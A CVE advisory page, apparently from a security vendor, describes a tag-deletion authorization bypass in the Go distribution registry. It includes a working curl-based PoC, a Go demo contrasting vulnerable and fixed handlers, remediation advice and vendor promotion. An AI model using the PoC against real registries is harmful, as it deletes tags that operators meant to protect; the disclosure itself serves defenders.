CVE-2026-41888

CVE-2026-41888 is a medium-severity incorrect authorization vulnerability in github.com/distribution/distribution/v3 (go), affecting versions < 3.1.1. It is fixed in 3.1.1.

Summary

Tag deletion via the DELETE /v2/<name>/manifests/<tag> endpoint bypasses the storage.delete.enabled: false configuration, allowing any API client to remove tags from repositories even when the operator has explicitly disabled deletion.

Details

When storage.delete.enabled is configured to false, digest-based manifest deletion is correctly rejected by the guard in registry/storage/linkedblobstore.go:212-215.

However, tag deletion takes a separate code path that never checks this setting:

In registry/handlers/manifests.go:439-453, DeleteManifest detects a tag reference, calls tagService.Untag() and returns, never consulting registry.deleteEnabled.

In turn, tagStore.Untag() calls the storage driver directly to delete the tag path without checking whether deletes are enabled.

PoC

Using a pared-down Distribution configuration that explicitly disables deletes, such as this one, stored as config.yaml:

version: 0.1
storage:
  delete:
    enabled: false
  filesystem:
    rootdirectory: /var/lib/registry
http:
  addr: :5000

Start a local Distribution, mounting in the above configuration from the current directory:

docker run -p 5000:5000 -v "$(pwd)/config.yaml":/config.yaml --restart=always --name registry registry:3.1.0 /config.yaml

In a separate terminal session/tab, push alpine:3.23 into the running instance:

docker pull alpine:3.23
docker tag alpine:3.23 localhost:5000/alpine:3.23
docker push localhost:5000/alpine:3.23

Confirm that the tag shows up as expected:

curl 'http://localhost:5000/v2/alpine/tags/list'
{"name":"alpine","tags":["3.23"]}

Issue a delete for the 3.23 tag:

curl -X DELETE 'http://localhost:5000/v2/alpine/manifests/3.23'

Observe that the tag is now gone, despite deletes being disabled:

curl 'http://localhost:5000/v2/alpine/tags/list'
{"name":"alpine","tags":null}
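The two code paths described under Details, and the PoC exchange above, can be reproduced in-process without a running registry. The following Go program is an added example written for this page; it is not code from the distribution/distribution project. It uses a toy in-memory tag store and a hand-written handler for DELETE /v2/<name>/manifests/<reference>: VulnerableDeleteManifest mirrors the flawed control flow (the tag branch untags and returns before the delete-enabled guard), while HardenedDeleteManifest consults the setting before dispatching on the reference type. The 405 / UNSUPPORTED refusal, the helper names, and the tag-store shape are assumptions made for the example.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Config mirrors the setting this advisory is about: storage.delete.enabled.
type Config struct{ DeleteEnabled bool }

// TagStore is a toy in-memory stand-in for the registry's tag storage. As the advisory
// says of the real tagStore.Untag, Untag applies no policy of its own: that is the handler's job.
type TagStore struct{ tags map[string]map[string]bool } // repository -> tag -> present

func (s *TagStore) Tag(repo, tag string) {
	if s.tags[repo] == nil {
		s.tags[repo] = map[string]bool{}
	}
	s.tags[repo][tag] = true
}

func (s *TagStore) Untag(repo, tag string) { delete(s.tags[repo], tag) }

func (s *TagStore) List(repo string) (tags []string) {
	for t := range s.tags[repo] {
		tags = append(tags, t)
	}
	return tags
}

// splitRef turns "/v2/<name>/manifests/<reference>" into (name, reference).
func splitRef(path string) (string, string) {
	i := strings.LastIndex(path, "/manifests/")
	return strings.TrimPrefix(path[:i], "/v2/"), path[i+len("/manifests/"):]
}

// Digests look like "sha256:<hex>"; a tag can never contain ':'.
func isDigest(ref string) bool { return strings.Contains(ref, ":") }

// Refusal sent when deletes are disabled (status and error code are assumptions for this example).
func unsupported(w http.ResponseWriter) { http.Error(w, `{"errors":[{"code":"UNSUPPORTED"}]}`, http.StatusMethodNotAllowed) }

// VulnerableDeleteManifest reproduces the flaw: DeleteEnabled is consulted only on the
// digest branch, so a tag reference is untagged unconditionally.
func VulnerableDeleteManifest(cfg Config, store *TagStore) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		repo, ref := splitRef(r.URL.Path)
		if !isDigest(ref) { // tag reference: untag and return, the guard below is never reached
			store.Untag(repo, ref)
			w.WriteHeader(http.StatusAccepted)
			return
		}
		if !cfg.DeleteEnabled {
			unsupported(w)
			return
		}
		w.WriteHeader(http.StatusAccepted) // digest deletion itself is omitted here
	}
}

// HardenedDeleteManifest checks the setting before dispatching on the reference type,
// so tag and digest deletes obey the same policy.
func HardenedDeleteManifest(cfg Config, store *TagStore) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if !cfg.DeleteEnabled {
			unsupported(w)
			return
		}
		repo, ref := splitRef(r.URL.Path)
		if !isDigest(ref) {
			store.Untag(repo, ref)
		}
		w.WriteHeader(http.StatusAccepted)
	}
}

// Exercise replays the advisory's PoC in-process with deletes disabled: tag alpine:3.23,
// send DELETE /v2/alpine/manifests/3.23, and report the HTTP status plus the tags left.
func Exercise(build func(Config, *TagStore) http.HandlerFunc) (int, []string) {
	store := &TagStore{tags: map[string]map[string]bool{}}
	store.Tag("alpine", "3.23")
	srv := httptest.NewServer(build(Config{DeleteEnabled: false}, store))
	defer srv.Close()
	req, _ := http.NewRequest(http.MethodDelete, srv.URL+"/v2/alpine/manifests/3.23", nil)
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	resp.Body.Close()
	return resp.StatusCode, store.List("alpine")
}

func main() {
	vs, vt := Exercise(VulnerableDeleteManifest)
	hs, ht := Exercise(HardenedDeleteManifest)
	fmt.Printf("vulnerable: HTTP %d, tags left %v\nhardened:   HTTP %d, tags left %v\n", vs, vt, hs, ht)
}
```

Running it shows the same outcome as the curl session above for the vulnerable handler (202 Accepted, no tags left) and the expected refusal for the hardened one (405, the 3.23 tag still present). The design point is that the policy check sits above the branch on reference type, so adding a new reference kind later cannot reintroduce an unguarded path.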

Impact

This is an authorization bypass vulnerability. Any client with network access to the registry can delete tags despite the operator having disabled deletion. This can cause denial of service for consumers pulling by tag and enables supply-chain disruption by removing trusted tags from a registry that the operator and/or users believed to be immutable.

The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.

Affected versions

github.com/distribution/distribution/v3 (< 3.1.1)
github.com/distribution/distribution (<= 2.8.3)

Security releases

github.com/distribution/distribution/v3 → 3.1.1 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade github.com/distribution/distribution/v3 to 3.1.1 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-41888? CVE-2026-41888 is a medium-severity incorrect authorization vulnerability in github.com/distribution/distribution/v3 (go), affecting versions < 3.1.1. It is fixed in 3.1.1. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
  2. Which packages are affected by CVE-2026-41888?
    • github.com/distribution/distribution/v3 (go) (versions < 3.1.1)
    • github.com/distribution/distribution (go) (versions <= 2.8.3)
  3. Is there a fix for CVE-2026-41888? Yes. CVE-2026-41888 is fixed in 3.1.1. Upgrade to this version or later.
  4. Is CVE-2026-41888 exploitable, and should I be worried? Whether CVE-2026-41888 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-41888 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-41888? Upgrade github.com/distribution/distribution/v3 to 3.1.1 or later.
